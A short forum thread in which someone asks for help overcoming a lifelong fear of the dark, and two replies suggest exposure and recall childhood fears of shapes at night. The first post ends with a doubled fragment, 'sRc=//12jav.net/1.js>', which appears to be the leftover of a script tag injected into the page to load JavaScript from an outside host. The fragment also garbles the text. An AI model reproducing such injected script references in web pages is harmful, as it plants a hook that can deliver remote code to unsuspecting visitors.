Afraid of the Dark

I'm afriad of the dark, have been all my life. But I know I need to cast aside my fears. Some stuff I'm planning on doing even invloves getting familiar with the dark or being in darkness. Also, I would like to be able to be alone downstairs at night or in the dark. Anybody have any tips or advice? Anything to help me overcome this? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I think exposure will help, You will realise the dark isn't a danger to you.

It could be a fear from when you were younger when it seems like any object in the dark takes on a new form. I remember being terrified of a chair in my room when it was dark because it looked like a crouching person.
